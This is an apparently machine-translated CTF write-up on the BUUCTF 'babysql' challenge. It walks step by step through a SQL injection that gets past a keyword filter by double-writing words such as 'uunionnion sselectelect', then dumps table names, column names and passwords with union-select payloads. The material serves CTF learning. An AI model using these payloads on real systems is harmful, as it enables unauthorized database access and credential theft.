当前位置:网站首页>Buuctf's babysql[geek challenge 2019]
Buuctf's babysql[geek challenge 2019]
2022-06-13 00:27:00 【Golden silk】
Catalog
Closed number test
Try to login with universal password first
An error is reported when logging in , According to the error reporting statement , Should be or Deleted by filtering , Try double writing to bypass
Login successfully , It is determined that the closure number is ', Later tests found that , Filtered keywords can be bypassed by double spelling
Field number judgment
use order by The number of fields tested is 3, Then inject... With joint injection , structure payload
1' uunionnion sselectelect 1,2,3#
Keyword filtering determines
Determine echo location , Before joint injection , You have to look at filtering out the main keywords of joint injection , structure payload,
1' uunionnion sselectelect 1,'from','group_concat()'#
from No response , It's filtered out , Then continue to construct payload
1' uunionnion sselectelect 1,'information_schema.tables','where'#
emm, Here is or Filtered out and where,
Explosion meter
structure payload
1' uunionnion sselectelect 1,2,group_concat(table_name) ffromrom infoorrmation_schema.tables wwherehere table_schema = database()#
Then burst the field
1' uunionnion sselectelect 1,2,group_concat(column_name) ffromrom infoorrmation_schema.columns wwherehere table_schema = database() aandnd table_name = 'b4bsql'#
Then check the value
1' uunionnion sselectelect 1,2,group_concat(passwoorrd) ffromrom b4bsql#
Get flag
边栏推荐
- Installation of IK word breaker
- The origin of MySQL in bedtime stories
- Can branches sign labor contracts with employees
- [LeetCode]13. Roman numerals to integers thirty
- On the usage details and special usage of switch case
- Packaging and uplink of btcd transaction process (III)
- How to quickly query the online status of mobile phones
- 63. different paths II
- [LeetCode]14. Longest common prefix thirty-eight
- Test platform series (97) perfect the case part
猜你喜欢
Installation of IK word breaker
分公司能与员工签劳动合同么
Will PM (Project Manager) take the PMP Exam?
The difference between caching and buffering
Some basic design knowledge
A detailed explanation of synchronized
Using fastjson to solve the problem of returning an empty array from a null value of a field string object
Use of split() method in string class
Browser cache execution process
Masa auth - overall design from the user's perspective
随机推荐
63. 不同路径 II
启牛商学院里面的券商账户是安全的吗?开户费率低吗
How to pass the PMP review?
如何快速查询手机号码归属地和运营商
[hcie discussion] multicast igmp-a
Will the salary increase after obtaining PMP certification?
PLC can also make small games ----- CoDeSys can write small games of guessing numbers
C language standard IO, such as printf(), scanf(), etc
PMP training organization
How does the PMP handle the withdrawal?
What are the levels of safety accidents
2022施工員-設備方向-通用基礎(施工員)操作證考試題及模擬考試
[matlab] matrix
ucore lab3
Generate two-dimensional code in Delphi
分公司能与员工签劳动合同么
[LeetCode]21. Merge two ordered linked lists twenty-nine
Matlab [path planning] - UAV drug distribution route optimization
Transaction creation of btcd transaction process (I)
Is the PMP training organization an actual training?